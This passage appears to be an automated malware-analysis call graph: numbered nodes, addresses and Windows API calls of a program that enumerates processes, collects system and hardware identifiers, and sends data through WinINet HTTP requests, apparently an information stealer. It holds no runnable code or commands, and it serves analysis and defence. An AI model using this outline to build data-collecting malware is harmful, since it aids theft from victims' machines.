83aaa 21662->21663 21664 847e8 3 API calls 21663->21664 21665 83ac1 21664->21665 21666 847e8 3 API calls 21665->21666 21667 83ad7 21666->21667 21668 847e8 3 API calls 21667->21668 21669 83aee 21668->21669 21670 847e8 3 API calls 21669->21670 21671 83b05 21670->21671 21672 847e8 3 API calls 21671->21672 21673 83b1c 21672->21673 21674 847e8 3 API calls 21673->21674 21675 83b33 21674->21675 21676 847e8 3 API calls 21675->21676 21677 83b4a 21676->21677 21678 847e8 3 API calls 21677->21678 21679 83b61 21678->21679 21680 847e8 3 API calls 21679->21680 21681 83b75 21680->21681 21682 847e8 3 API calls 21681->21682 21683 83b8c 21682->21683 21684 847e8 3 API calls 21683->21684 21685 83ba3 21684->21685 21686 847e8 3 API calls 21685->21686 21687 83bba 21686->21687 21688 847e8 3 API calls 21687->21688 21689 83bd1 21688->21689 21690 847e8 3 API calls 21689->21690 21691 83be8 21690->21691 21692 847e8 3 API calls 21691->21692 21693 83bff 21692->21693 21694 847e8 3 API calls 21693->21694 21695 83c19 21694->21695 21696 847e8 3 API calls 21695->21696 21697 83c30 21696->21697 21698 847e8 3 API calls 21697->21698 21699 83c47 21698->21699 21700 847e8 3 API calls 21699->21700 21701 83c5e 21700->21701 21702 847e8 3 API calls 21701->21702 21703 83c75 21702->21703 21704 847e8 3 API calls 21703->21704 21705 83c8c 21704->21705 21706 847e8 3 API calls 21705->21706 21707 83ca3 21706->21707 21708 847e8 3 API calls 21707->21708 21709 83cb7 21708->21709 21710 847e8 3 API calls 21709->21710 21711 83cd1 21710->21711 21712 847e8 3 API calls 21711->21712 21713 83ce8 21712->21713 21714 847e8 3 API calls 21713->21714 21715 83cff 21714->21715 21716 847e8 3 API calls 21715->21716 21717 83d16 21716->21717 21718 847e8 3 API calls 21717->21718 21719 83d2c 21718->21719 21720 847e8 3 API calls 21719->21720 21721 83d43 21720->21721 21722 847e8 3 API calls 21721->21722 21723 83d57 21722->21723 21724 847e8 3 API calls 21723->21724 21725 83d6e 21724->21725 21726 847e8 3 API calls 21725->21726 21727 83d85 21726->21727 21728 847e8 3 API calls 21727->21728 21729 83d9c 21728->21729 21730 847e8 3 API calls 21729->21730 21731 83db3 21730->21731 21732 847e8 3 API calls 21731->21732 21733 83dca 21732->21733 21734 847e8 3 API calls 21733->21734 21735 83de1 21734->21735 21736 847e8 3 API calls 21735->21736 21737 83df8 21736->21737 21738 847e8 3 API calls 21737->21738 21739 83e0f 21738->21739 21740 847e8 3 API calls 21739->21740 21741 83e26 21740->21741 21742 847e8 3 API calls 21741->21742 21743 83e40 21742->21743 21744 847e8 3 API calls 21743->21744 21745 83e57 21744->21745 21746 847e8 3 API calls 21745->21746 21747 83e6e 21746->21747 21748 847e8 3 API calls 21747->21748 21749 83e84 21748->21749 21750 847e8 3 API calls 21749->21750 21751 83e9b 21750->21751 21752 847e8 3 API calls 21751->21752 21753 83eb2 21752->21753 21754 847e8 3 API calls 21753->21754 21755 83ec9 21754->21755 21756 847e8 3 API calls 21755->21756 21757 83ee0 21756->21757 21758 847e8 3 API calls 21757->21758 21759 83efa 21758->21759 21760 847e8 3 API calls 21759->21760 21761 83f10 21760->21761 21762 847e8 3 API calls 21761->21762 21763 83f27 21762->21763 21764 847e8 3 API calls 21763->21764 21765 83f3e 21764->21765 21766 847e8 3 API calls 21765->21766 21767 83f55 21766->21767 21768 847e8 3 API calls 21767->21768 21769 83f6c 21768->21769 21770 847e8 3 API calls 21769->21770 21771 83f80 21770->21771 21772 847e8 3 API calls 21771->21772 21773 83f97 21772->21773 21774 847e8 3 API calls 21773->21774 21775 83fb1 21774->21775 21776 847e8 3 API calls 21775->21776 21777 83fc7 21776->21777 21778 847e8 3 API calls 21777->21778 21779 83fde 21778->21779 21780 847e8 3 API calls 21779->21780 21781 83ff2 21780->21781 21782 847e8 3 API calls 21781->21782 21783 84009 21782->21783 21784 847e8 3 API calls 21783->21784 21785 84020 21784->21785 21786 847e8 3 API calls 21785->21786 21787 84037 21786->21787 21788 847e8 3 API calls 21787->21788 21789 8404e 21788->21789 21790 847e8 3 API calls 21789->21790 21791 84067 21790->21791 21792 847e8 3 API calls 21791->21792 21793 8407e 21792->21793 21794 847e8 3 API calls 21793->21794 21795 84094 21794->21795 21796 847e8 3 API calls 21795->21796 21797 840a8 21796->21797 21798 847e8 3 API calls 21797->21798 21799 840bf 21798->21799 21800 847e8 3 API calls 21799->21800 21801 840d6 21800->21801 21802 847e8 3 API calls 21801->21802 21803 840ed 21802->21803 21804 847e8 3 API calls 21803->21804 21805 84104 21804->21805 21806 847e8 3 API calls 21805->21806 21807 8411e 21806->21807 21808 847e8 3 API calls 21807->21808 21809 84135 21808->21809 21810 847e8 3 API calls 21809->21810 21811 8414c 21810->21811 21812 847e8 3 API calls 21811->21812 21813 84163 21812->21813 21814 847e8 3 API calls 21813->21814 21815 84179 21814->21815 21816 847e8 3 API calls 21815->21816 21817 8418d 21816->21817 21818 847e8 3 API calls 21817->21818 21819 841a1 21818->21819 21820 847e8 3 API calls 21819->21820 21821 841b8 21820->21821 21822 847e8 3 API calls 21821->21822 21823 841d2 21822->21823 21824 847e8 3 API calls 21823->21824 21825 841e8 21824->21825 21826 847e8 3 API calls 21825->21826 21827 841ff 21826->21827 21828 847e8 3 API calls 21827->21828 21829 84216 21828->21829 21830 847e8 3 API calls 21829->21830 21831 8422d 21830->21831 21832 847e8 3 API calls 21831->21832 21833 84244 21832->21833 21834 847e8 3 API calls 21833->21834 21835 84258 21834->21835 21836 847e8 3 API calls 21835->21836 21837 8426e 21836->21837 21838 847e8 3 API calls 21837->21838 21839 84288 21838->21839 21840 847e8 3 API calls 21839->21840 21841 8429f 21840->21841 21842 847e8 3 API calls 21841->21842 21843 842b6 21842->21843 21844 847e8 3 API calls 21843->21844 21845 842cc 21844->21845 21846 847e8 3 API calls 21845->21846 21847 842e3 21846->21847 21848 847e8 3 API calls 21847->21848 21849 842fa 21848->21849 21850 847e8 3 API calls 21849->21850 21851 84311 21850->21851 21852 847e8 3 API calls 21851->21852 21853 84325 21852->21853 21854 847e8 3 API calls 21853->21854 21855 8433c 21854->21855 21856 847e8 3 API calls 21855->21856 21857 84353 21856->21857 21858 847e8 3 API calls 21857->21858 21859 8436a 21858->21859 21860 847e8 3 API calls 21859->21860 21861 84381 21860->21861 21862 847e8 3 API calls 21861->21862 21863 84395 21862->21863 21864 847e8 3 API calls 21863->21864 21865 843ac 21864->21865 21866 847e8 3 API calls 21865->21866 21867 843c3 21866->21867 21868 847e8 3 API calls 21867->21868 21869 843da 21868->21869 21870 847e8 3 API calls 21869->21870 21871 843f1 21870->21871 21872 847e8 3 API calls 21871->21872 21873 84408 21872->21873 21874 847e8 3 API calls 21873->21874 21875 8441c 21874->21875 21876 847e8 3 API calls 21875->21876 21877 84433 21876->21877 21878 847e8 3 API calls 21877->21878 21879 8444a 21878->21879 21880 847e8 3 API calls 21879->21880 21881 8445e 21880->21881 21882 847e8 3 API calls 21881->21882 21883 84472 21882->21883 21884 847e8 3 API calls 21883->21884 21885 84486 21884->21885 21886 847e8 3 API calls 21885->21886 21887 844a0 21886->21887 21888 847e8 3 API calls 21887->21888 21889 844b7 21888->21889 21890 847e8 3 API calls 21889->21890 21891 844cd 21890->21891 21892 847e8 3 API calls 21891->21892 21893 844e4 21892->21893 21894 847e8 3 API calls 21893->21894 21895 844fa 21894->21895 21896 847e8 3 API calls 21895->21896 21897 84511 21896->21897 21898 847e8 3 API calls 21897->21898 21899 84528 21898->21899 21900 847e8 3 API calls 21899->21900 21901 8453e 21900->21901 21902 847e8 3 API calls 21901->21902 21903 84558 21902->21903 21904 847e8 3 API calls 21903->21904 21905 8456f 21904->21905 21906 847e8 3 API calls 21905->21906 21907 84586 21906->21907 21908 847e8 3 API calls 21907->21908 21909 8459d 21908->21909 21910 847e8 3 API calls 21909->21910 21911 845b4 21910->21911 21912 847e8 3 API calls 21911->21912 21913 845cb 21912->21913 21914 847e8 3 API calls 21913->21914 21915 845e2 21914->21915 21916 847e8 3 API calls 21915->21916 21917 845f9 21916->21917 21918 847e8 3 API calls 21917->21918 21919 84612 21918->21919 21920 847e8 3 API calls 21919->21920 21921 84629 21920->21921 21922 847e8 3 API calls 21921->21922 21923 84642 21922->21923 21924 847e8 3 API calls 21923->21924 21925 84656 21924->21925 21926 847e8 3 API calls 21925->21926 21927 8466d 21926->21927 21928 847e8 3 API calls 21927->21928 21929 84684 21928->21929 21930 847e8 3 API calls 21929->21930 21931 8469b 21930->21931 21932 847e8 3 API calls 21931->21932 21933 846b2 21932->21933 21934 847e8 3 API calls 21933->21934 21935 846cc 21934->21935 21936 847e8 3 API calls 21935->21936 21937 846e3 21936->21937 21938 847e8 3 API calls 21937->21938 21939 846f9 21938->21939 21940 847e8 3 API calls 21939->21940 21941 84710 21940->21941 21942 847e8 3 API calls 21941->21942 21943 84727 21942->21943 21944 847e8 3 API calls 21943->21944 21945 8473d 21944->21945 21946 847e8 3 API calls 21945->21946 21947 84754 21946->21947 21948 847e8 3 API calls 21947->21948 21949 84768 21948->21949 21950 847e8 3 API calls 21949->21950 21951 84781 21950->21951 21952 847e8 3 API calls 21951->21952 21953 84797 21952->21953 21954 847e8 3 API calls 21953->21954 21955 847ae 21954->21955 21956 847e8 3 API calls 21955->21956 21957 847c5 21956->21957 21958 847e8 3 API calls 21957->21958 21959 847dc 21958->21959 21959->20976 23125 af109 21960->23125 21962 9258e CreateToolhelp32Snapshot Process32First 21963 925ef CloseHandle 21962->21963 21964 925c2 Process32Next 21962->21964 23126 af165 21963->23126 21964->21963 21965 925d4 StrCmpCA 21964->21965 21965->21964 21967 925e6 21965->21967 21967->21964 21970 904e7 lstrcpyA 21969->21970 21971 91c67 21970->21971 21972 904e7 lstrcpyA 21971->21972 21973 91c75 GetSystemTime 21972->21973 21974 91c91 21973->21974 21975 9d016 DName::DName 5 API calls 21974->21975 21976 91cc8 21975->21976 21976->20982 21979 905e1 21977->21979 21978 90605 21978->20998 21979->21978 21980 905f3 lstrcpyA lstrcatA 21979->21980 21980->21978 21982 90519 lstrcpyA 21981->21982 21983 81d07 21982->21983 21984 90519 lstrcpyA 21983->21984 21985 81d12 21984->21985 21986 90519 lstrcpyA 21985->21986 21987 81d1d 21986->21987 21988 90519 lstrcpyA 21987->21988 21989 81d34 21988->21989 21990 969b6 21989->21990 21991 90549 2 API calls 21990->21991 21992 969ec 21991->21992 21993 90549 2 API calls 21992->21993 21994 969f9 21993->21994 21995 90549 2 API calls 21994->21995 21996 96a06 21995->21996 21997 904e7 lstrcpyA 21996->21997 21998 96a13 21997->21998 21999 904e7 lstrcpyA 21998->21999 22000 96a20 21999->22000 22001 904e7 lstrcpyA 22000->22001 22002 96a2d 22001->22002 22003 904e7 lstrcpyA 22002->22003 22004 96a3a 22003->22004 22005 904e7 lstrcpyA 22004->22005 22006 96a47 22005->22006 22007 904e7 lstrcpyA 22006->22007 22046 96a54 22007->22046 22010 96a98 StrCmpCA 22011 96af1 StrCmpCA 22010->22011 22010->22046 22012 96cd4 22011->22012 22011->22046 22015 9058d lstrcpyA 22012->22015 22016 96cdf 22015->22016 22018 904e7 lstrcpyA 22016->22018 22019 96cec 22018->22019 22021 9058d lstrcpyA 22019->22021 22020 81cfd lstrcpyA 22020->22046 22061 96c2c 22021->22061 22022 9683e 28 API calls 22022->22046 22023 968c6 33 API calls 22023->22046 22024 9058d lstrcpyA 22024->22046 22025 904e7 lstrcpyA 22026 96d0b 22025->22026 22028 9058d lstrcpyA 22026->22028 22027 96b51 StrCmpCA 22029 96baa StrCmpCA 22027->22029 22027->22046 22030 96d15 22028->22030 22032 96bc0 StrCmpCA 22029->22032 22033 96ca3 22029->22033 23141 96da2 22030->23141 22034 96c72 22032->22034 22035 96bd6 StrCmpCA 22032->22035 22036 9058d lstrcpyA 22033->22036 22041 9058d lstrcpyA 22034->22041 22038 96be8 StrCmpCA 22035->22038 22039 96c3e 22035->22039 22037 96cae 22036->22037 22043 904e7 lstrcpyA 22037->22043 22044 96c0a 22038->22044 22045 96bfa Sleep 22038->22045 22048 9058d lstrcpyA 22039->22048 22040 90519 lstrcpyA 22040->22046 22047 96c7d 22041->22047 22049 96cbb 22043->22049 22050 9058d lstrcpyA 22044->22050 22045->22046 22046->22010 22046->22011 22046->22020 22046->22022 22046->22023 22046->22024 22046->22027 22046->22029 22046->22040 23129 829f8 22046->23129 23132 82a09 22046->23132 23135 82a2b 22046->23135 23138 82a3c 22046->23138 23148 82a1a lstrcpyA 22046->23148 23149 82a4d lstrcpyA 22046->23149 22051 904e7 lstrcpyA 22047->22051 22052 96c49 22048->22052 22053 9058d lstrcpyA 22049->22053 22054 96c15 22050->22054 22055 96c8a 22051->22055 22056 904e7 lstrcpyA 22052->22056 22053->22061 22058 904e7 lstrcpyA 22054->22058 22059 9058d lstrcpyA 22055->22059 22057 96c56 22056->22057 22060 9058d lstrcpyA 22057->22060 22062 96c22 22058->22062 22059->22061 22060->22061 22061->22025 22063 9058d lstrcpyA 22062->22063 22063->22061 22064 96d28 22064->21009 22066 9058d lstrcpyA 22065->22066 22067 98257 22066->22067 22068 9058d lstrcpyA 22067->22068 22069 98262 22068->22069 22070 9058d lstrcpyA 22069->22070 22071 9826d 22070->22071 22071->21014 22073 90529 22072->22073 22074 9053e 22073->22074 22075 90536 lstrcpyA 22073->22075 22074->21025 22075->22074 22077 909df 22076->22077 22078 909e6 GetVolumeInformationA 22076->22078 22077->22078 22079 90a4d 22078->22079 22079->22079 22080 90a62 GetProcessHeap HeapAlloc 22079->22080 22081 90a7d 22080->22081 22082 90a8c wsprintfA lstrcatA 22080->22082 22084 904e7 lstrcpyA 22081->22084 23150 91684 GetCurrentHwProfileA 22082->23150 22086 90a85 22084->22086 22085 90ac7 lstrlenA 23166 923d5 lstrcpyA malloc strncpy 22085->23166 22089 9d016 DName::DName 5 API calls 22086->22089 22088 90aea lstrcatA 22091 90b01 22088->22091 22090 90b2e 22089->22090 22090->21052 22092 904e7 lstrcpyA 22091->22092 22093 90b18 22092->22093 22093->22086 22095 90519 lstrcpyA 22094->22095 22096 84b59 22095->22096 23170 84ab6 22096->23170 22098 84b65 22099 904e7 lstrcpyA 22098->22099 22100 84b81 22099->22100 22101 904e7 lstrcpyA 22100->22101 22102 84b91 22101->22102 22103 904e7 lstrcpyA 22102->22103 22104 84ba1 22103->22104 22105 904e7 lstrcpyA 22104->22105 22106 84bb1 22105->22106 22107 904e7 lstrcpyA 22106->22107 22108 84bc1 InternetOpenA StrCmpCA 22107->22108 22109 84bf5 22108->22109 22110 85194 InternetCloseHandle 22109->22110 22111 84c07 22109->22111 22122 851e1 22110->22122 22112 91c4a 7 API calls 22111->22112 22113 84c15 22112->22113 22114 905c7 2 API calls 22113->22114 22115 84c28 22114->22115 22116 9058d lstrcpyA 22115->22116 22117 84c33 22116->22117 22118 90609 3 API calls 22117->22118 22119 84c5f 22118->22119 22120 9058d lstrcpyA 22119->22120 22121 84c6a 22120->22121 22124 90609 3 API calls 22121->22124 22123 9d016 DName::DName 5 API calls 22122->22123 22125 85235 22123->22125 22126 84c8b 22124->22126 22228 939c2 StrCmpCA 22125->22228 22127 9058d lstrcpyA 22126->22127 22128 84c96 22127->22128 22129 905c7 2 API calls 22128->22129 22130 84cb8 22129->22130 22131 9058d lstrcpyA 22130->22131 22132 84cc3 22131->22132 22133 90609 3 API calls 22132->22133 22134 84ce4 22133->22134 22135 9058d lstrcpyA 22134->22135 22136 84cef 22135->22136 22137 90609 3 API calls 22136->22137 22138 84d10 22137->22138 22139 9058d lstrcpyA 22138->22139 22140 84d1b 22139->22140 22141 90609 3 API calls 22140->22141 22142 84d3d 22141->22142 22143 905c7 2 API calls 22142->22143 22144 84d48 22143->22144 22145 9058d lstrcpyA 22144->22145 22146 84d53 22145->22146 22147 84d69 InternetConnectA 22146->22147 22147->22110 22148 84d97 HttpOpenRequestA 22147->22148 22149 85188 InternetCloseHandle 22148->22149 22150 84dd7 22148->22150 22149->22110 22151 84dfb 22150->22151 22152 84ddf InternetSetOptionA 22150->22152 22153 90609 3 API calls 22151->22153 22152->22151 22154 84e11 22153->22154 22155 9058d lstrcpyA 22154->22155 22156 84e1c 22155->22156 22157 905c7 2 API calls 22156->22157 22158 84e3e 22157->22158 22159 9058d lstrcpyA 22158->22159 22160 84e49 22159->22160 22161 90609 3 API calls 22160->22161 22162 84e6a 22161->22162 22163 9058d lstrcpyA 22162->22163 22164 84e75 22163->22164 22165 90609 3 API calls 22164->22165 22166 84e97 22165->22166 22167 9058d lstrcpyA 22166->22167 22168 84ea2 22167->22168 22169 90609 3 API calls 22168->22169 22170 84ec3 22169->22170 22171 9058d lstrcpyA 22170->22171 22172 84ece 22171->22172 22173 90609 3 API calls 22172->22173 22174 84eef 22173->22174 22175 9058d lstrcpyA 22174->22175 22176 84efa 22175->22176 22177 905c7 2 API calls 22176->22177 22178 84f19 22177->22178 22179 9058d lstrcpyA 22178->22179 22180 84f24 22179->22180 22181 90609 3 API calls 22180->22181 22182 84f45 22181->22182 22183 9058d lstrcpyA 22182->22183 22184 84f50 22183->22184 22185 90609 3 API calls 22184->22185 22186 84f71 22185->22186 22187 9058d lstrcpyA 22186->22187 22188 84f7c 22187->22188 22189 905c7 2 API calls 22188->22189 22190 84f9e 22189->22190 22191 9058d lstrcpyA 22190->22191 22192 84fa9 22191->22192 22193 90609 3 API calls 22192->22193 22194 84fca 22193->22194 22195 9058d lstrcpyA 22194->22195 22196 84fd5 22195->22196 22197 90609 3 API calls 22196->22197 22198 84ff7 22197->22198 22199 9058d lstrcpyA 22198->22199 22200 85002 22199->22200 22201 90609 3 API calls 22200->22201 22202 85023 22201->22202 22203 9058d lstrcpyA 22202->22203 22204 8502e 22203->22204 22205 90609 3 API calls 22204->22205 22206 8504f 22205->22206 22207 9058d lstrcpyA 22206->22207 22208 8505a 22207->22208 22209 905c7 2 API calls 22208->22209 22210 85079 22209->22210 22211 9058d lstrcpyA 22210->22211 22212 85084 22211->22212 22213 904e7 lstrcpyA 22212->22213 22214 8509f 22213->22214 22215 905c7 2 API calls 22214->22215 22216 850b6 22215->22216 22217 905c7 2 API calls 22216->22217 22218 850c7 22217->22218 22219 9058d lstrcpyA 22218->22219 22220 850d2 22219->22220 22221 850e8 lstrlenA lstrlenA HttpSendRequestA 22220->22221 22222 8515c InternetReadFile 22221->22222 22223 85176 InternetCloseHandle 22222->22223 22226 8511c 22222->22226 22224 82920 22223->22224 22224->22149 22225 90609 3 API calls 22225->22226 22226->22222 22226->22223 22226->22225 22227 9058d lstrcpyA 22226->22227 22227->22226 22229 939e8 strtok_s 22228->22229 22230 939e1 ExitProcess 22228->22230 22231 93a04 22229->22231 22232 93b48 22229->22232 22233 93b2a strtok_s 22231->22233 22234 93a59 StrCmpCA 22231->22234 22235 93ac9 StrCmpCA 22231->22235 22236 93a3d StrCmpCA 22231->22236 22237 93a9f StrCmpCA 22231->22237 22238 93ade StrCmpCA 22231->22238 22239 93a21 StrCmpCA 22231->22239 22240 93a75 StrCmpCA 22231->22240 22241 93ab4 StrCmpCA 22231->22241 22242 93af4 StrCmpCA 22231->22242 22243 93b16 StrCmpCA 22231->22243 22244 90549 2 API calls 22231->22244 22232->21061 22233->22231 22233->22232 22234->22231 22234->22233 22235->22231 22235->22233 22236->22231 22236->22233 22237->22231 22237->22233 22238->22233 22239->22231 22239->22233 22240->22231 22240->22233 22241->22231 22241->22233 22242->22233 22243->22233 22244->22231 22246 90519 lstrcpyA 22245->22246 22247 85f64 22246->22247 22248 84ab6 5 API calls 22247->22248 22249 85f70 22248->22249 22250 904e7 lstrcpyA 22249->22250 22251 85f8c 22250->22251 22252 904e7 lstrcpyA 22251->22252 22253 85f9c 22252->22253 22254 904e7 lstrcpyA 22253->22254 22255 85fac 22254->22255 22256 904e7 lstrcpyA 22255->22256 22257 85fbc 22256->22257 22258 904e7 lstrcpyA 22257->22258 22259 85fcc InternetOpenA StrCmpCA 22258->22259 22260 86000 22259->22260 22261 866ff InternetCloseHandle 22260->22261 22262 86012 22260->22262 23174 88048 CryptStringToBinaryA 22261->23174 22264 91c4a 7 API calls 22262->22264 22265 86020 22264->22265 22267 905c7 2 API calls 22265->22267 22269 86033 22267->22269 22268 90549 2 API calls 22270 86739 22268->22270 22271 9058d lstrcpyA 22269->22271 22272 90609 3 API calls 22270->22272 22275 8603e 22271->22275 22273 86750 22272->22273 22274 9058d lstrcpyA 22273->22274 22280 8675b 22274->22280 22276 90609 3 API calls 22275->22276 22277 8606a 22276->22277 22278 9058d lstrcpyA 22277->22278 22279 86075 22278->22279 22282 90609 3 API calls 22279->22282 22281 9d016 DName::DName 5 API calls 22280->22281 22283 867eb 22281->22283 22284 86096 22282->22284 22413 9343f strtok_s 22283->22413 22285 9058d lstrcpyA 22284->22285 22286 860a1 22285->22286 22287 905c7 2 API calls 22286->22287 22288 860c3 22287->22288 22289 9058d lstrcpyA 22288->22289 22290 860ce 22289->22290 22291 90609 3 API calls 22290->22291 22292 860ef 22291->22292 22293 9058d lstrcpyA 22292->22293 22294 860fa 22293->22294 22295 90609 3 API calls 22294->22295 22296 8611b 22295->22296 22297 9058d lstrcpyA 22296->22297 22298 86126 22297->22298 22299 90609 3 API calls 22298->22299 22300 86148 22299->22300 22301 905c7 2 API calls 22300->22301 22302 86153 22301->22302 22303 9058d lstrcpyA 22302->22303 22304 8615e 22303->22304 22305 86174 InternetConnectA 22304->22305 22305->22261 22306 861a2 HttpOpenRequestA 22305->22306 22307 861e2 22306->22307 22308 866f3 InternetCloseHandle 22306->22308 22309 861ea InternetSetOptionA 22307->22309 22310 86206 22307->22310 22308->22261 22309->22310 22311 90609 3 API calls 22310->22311 22312 8621c 22311->22312 22313 9058d lstrcpyA 22312->22313 22314 86227 22313->22314 22315 905c7 2 API calls 22314->22315 22316 86249 22315->22316 22317 9058d lstrcpyA 22316->22317 22318 86254 22317->22318 22319 90609 3 API calls 22318->22319 22320 86275 22319->22320 22321 9058d lstrcpyA 22320->22321 22322 86280 22321->22322 22323 90609 3 API calls 22322->22323 22324 862a2 22323->22324 22325 9058d lstrcpyA 22324->22325 22326 862ad 22325->22326 22327 90609 3 API calls 22326->22327 22328 862cf 22327->22328 22329 9058d lstrcpyA 22328->22329 22330 862da 22329->22330 22331 90609 3 API calls 22330->22331 22332 862fb 22331->22332 22333 9058d lstrcpyA 22332->22333 22334 86306 22333->22334 22335 905c7 2 API calls 22334->22335 22336 86325 22335->22336 22337 9058d lstrcpyA 22336->22337 22338 86330 22337->22338 22339 90609 3 API calls 22338->22339 22340 86351 22339->22340 22341 9058d lstrcpyA 22340->22341 22342 8635c 22341->22342 22343 90609 3 API calls 22342->22343 22344 8637d 22343->22344 22345 9058d lstrcpyA 22344->22345 22346 86388 22345->22346 22347 905c7 2 API calls 22346->22347 22348 863aa 22347->22348 22349 9058d lstrcpyA 22348->22349 22350 863b5 22349->22350 22351 90609 3 API calls 22350->22351 22352 863d6 22351->22352 22353 9058d lstrcpyA 22352->22353 22354 863e1 22353->22354 22355 90609 3 API calls 22354->22355 22356 86403 22355->22356 22357 9058d lstrcpyA 22356->22357 22358 8640e 22357->22358 22359 90609 3 API calls 22358->22359 22360 8642f 22359->22360 22361 9058d lstrcpyA 22360->22361 22362 8643a 22361->22362 22363 90609 3 API calls 22362->22363 22364 8645b 22363->22364 22365 9058d lstrcpyA 22364->22365 22366 86466 22365->22366 22367 90609 3 API calls 22366->22367 22368 86487 22367->22368 22369 9058d lstrcpyA 22368->22369 22370 86492 22369->22370 22371 90609 3 API calls 22370->22371 22372 864b3 22371->22372 22373 9058d lstrcpyA 22372->22373 22374 864be 22373->22374 22375 90609 3 API calls 22374->22375 22376 864df 22375->22376 22377 9058d lstrcpyA 22376->22377 22378 864ea 22377->22378 22379 905c7 2 API calls 22378->22379 22380 86506 22379->22380 22381 9058d lstrcpyA 22380->22381 22382 86511 22381->22382 22383 90609 3 API calls 22382->22383 22384 86532 22383->22384 22385 9058d lstrcpyA 22384->22385 22386 8653d 22385->22386 22387 90609 3 API calls 22386->22387 22388 8655f 22387->22388 22389 9058d lstrcpyA 22388->22389 22390 8656a 22389->22390 22391 90609 3 API calls 22390->22391 22392 8658b 22391->22392 22393 9058d lstrcpyA 22392->22393 22394 86596 22393->22394 22395 90609 3 API calls 22394->22395 22396 865b7 22395->22396 22397 9058d lstrcpyA 22396->22397 22398 865c2 22397->22398 22399 905c7 2 API calls 22398->22399 22400 865e1 22399->22400 22401 9058d lstrcpyA 22400->22401 22402 865ec 22401->22402 22403 865f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 22402->22403 23179 a7050 22403->23179 22405 8663e lstrlenA lstrlenA 23180 a7050 22405->23180 22407 86667 lstrlenA HttpSendRequestA 22408 866d2 InternetReadFile 22407->22408 22409 866ec InternetCloseHandle 22408->22409 22411 86692 22408->22411 22409->22308 22410 90609 3 API calls 22410->22411 22411->22408 22411->22409 22411->22410 22412 9058d lstrcpyA 22411->22412 22412->22411 22414 934cc 22413->22414 22415 9346e 22413->22415 22414->21075 22416 934b6 strtok_s 22415->22416 22417 90549 2 API calls 22415->22417 22418 90549 2 API calls 22415->22418 22416->22414 22416->22415 22417->22416 22418->22415 22427 93286 22419->22427 22420 93385 22420->21089 22421 93332 StrCmpCA 22421->22427 22422 90549 2 API calls 22422->22427 22423 93367 strtok_s 22423->22427 22424 93301 StrCmpCA 22424->22427 22425 932dc StrCmpCA 22425->22427 22426 932ab StrCmpCA 22426->22427 22427->22420 22427->22421 22427->22422 22427->22423 22427->22424 22427->22425 22427->22426 22431 933bc 22428->22431 22434 93434 22428->22434 22429 933e2 StrCmpCA 22429->22431 22430 90549 2 API calls 22432 9341a strtok_s 22430->22432 22431->22429 22431->22430 22431->22432 22433 90549 2 API calls 22431->22433 22432->22431 22432->22434 22433->22431 22434->21101 22436 904e7 lstrcpyA 22435->22436 22437 93b9f 22436->22437 22438 90609 3 API calls 22437->22438 22439 93baf 22438->22439 22440 9058d lstrcpyA 22439->22440 22441 93bb7 22440->22441 22442 90609 3 API calls 22441->22442 22443 93bcf 22442->22443 22444 9058d lstrcpyA 22443->22444 22445 93bd7 22444->22445 22446 90609 3 API calls 22445->22446 22447 93bef 22446->22447 22448 9058d lstrcpyA 22447->22448 22449 93bf7 22448->22449 22450 90609 3 API calls 22449->22450 22451 93c0f 22450->22451 22452 9058d lstrcpyA 22451->22452 22453 93c17 22452->22453 22454 90609 3 API calls 22453->22454 22455 93c2f 22454->22455 22456 9058d lstrcpyA 22455->22456 22457 93c37 22456->22457 23181 90cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 22457->23181 22460 90609 3 API calls 22461 93c50 22460->22461 22462 9058d lstrcpyA 22461->22462 22463 93c58 22462->22463 22464 90609 3 API calls 22463->22464 22465 93c70 22464->22465 22466 9058d lstrcpyA 22465->22466 22467 93c78 22466->22467 22468 90609 3 API calls 22467->22468 22469 93c90 22468->22469 22470 9058d lstrcpyA 22469->22470 22471 93c98 22470->22471 23184 915d4 22471->23184 22474 90609 3 API calls 22475 93cb1 22474->22475 22476 9058d lstrcpyA 22475->22476 22477 93cb9 22476->22477 22478 90609 3 API calls 22477->22478 22479 93cd1 22478->22479 22480 9058d lstrcpyA 22479->22480 22481 93cd9 22480->22481 22482 90609 3 API calls 22481->22482 22483 93cf1 22482->22483 22484 9058d lstrcpyA 22483->22484 22485 93cf9 22484->22485 22486 91684 11 API calls 22485->22486 22487 93d09 22486->22487 22488 905c7 2 API calls 22487->22488 22489 93d16 22488->22489 22490 9058d lstrcpyA 22489->22490 22491 93d1e 22490->22491 22492 90609 3 API calls 22491->22492 22493 93d3e 22492->22493 22494 9058d lstrcpyA 22493->22494 22495 93d46 22494->22495 22496 90609 3 API calls 22495->22496 22497 93d5e 22496->22497 22498 9058d lstrcpyA 22497->22498 22499 93d66 22498->22499 22500 909a2 19 API calls 22499->22500 22501 93d76 22500->22501 22502 905c7 2 API calls 22501->22502 22503 93d83 22502->22503 22504 9058d lstrcpyA 22503->22504 22505 93d8b 22504->22505 22506 90609 3 API calls 22505->22506 22507 93dab 22506->22507 22508 9058d lstrcpyA 22507->22508 22509 93db3 22508->22509 22510 90609 3 API calls 22509->22510 22511 93dcb 22510->22511 22512 9058d lstrcpyA 22511->22512 22513 93dd3 22512->22513 22514 93ddb GetCurrentProcessId 22513->22514 23191 9224a OpenProcess 22514->23191 22517 905c7 2 API calls 22518 93df8 22517->22518 22519 9058d lstrcpyA 22518->22519 22520 93e00 22519->22520 22521 90609 3 API calls 22520->22521 22522 93e20 22521->22522 22523 9058d lstrcpyA 22522->22523 22524 93e28 22523->22524 22525 90609 3 API calls 22524->22525 22526 93e40 22525->22526 22527 9058d lstrcpyA 22526->22527 22528 93e48 22527->22528 22529 90609 3 API calls 22528->22529 22530 93e60 22529->22530 22531 9058d lstrcpyA 22530->22531 22532 93e68 22531->22532 22533 90609 3 API calls 22532->22533 22534 93e80 22533->22534 22535 9058d lstrcpyA 22534->22535 22536 93e88 22535->22536 23198 90b30 GetProcessHeap HeapAlloc 22536->23198 22539 90609 3 API calls 22540 93ea1 22539->22540 22541 9058d lstrcpyA 22540->22541 22542 93ea9 22541->22542 22543 90609 3 API calls 22542->22543 22544 93ec1 22543->22544 22545 9058d lstrcpyA 22544->22545 22546 93ec9 22545->22546 22547 90609 3 API calls 22546->22547 22548 93ee1 22547->22548 22549 9058d lstrcpyA 22548->22549 22550 93ee9 22549->22550 23205 91807 22550->23205 22553 905c7 2 API calls 22554 93f06 22553->22554 22555 9058d lstrcpyA 22554->22555 22556 93f0e 22555->22556 22557 90609 3 API calls 22556->22557 22558 93f2e 22557->22558 22559 9058d 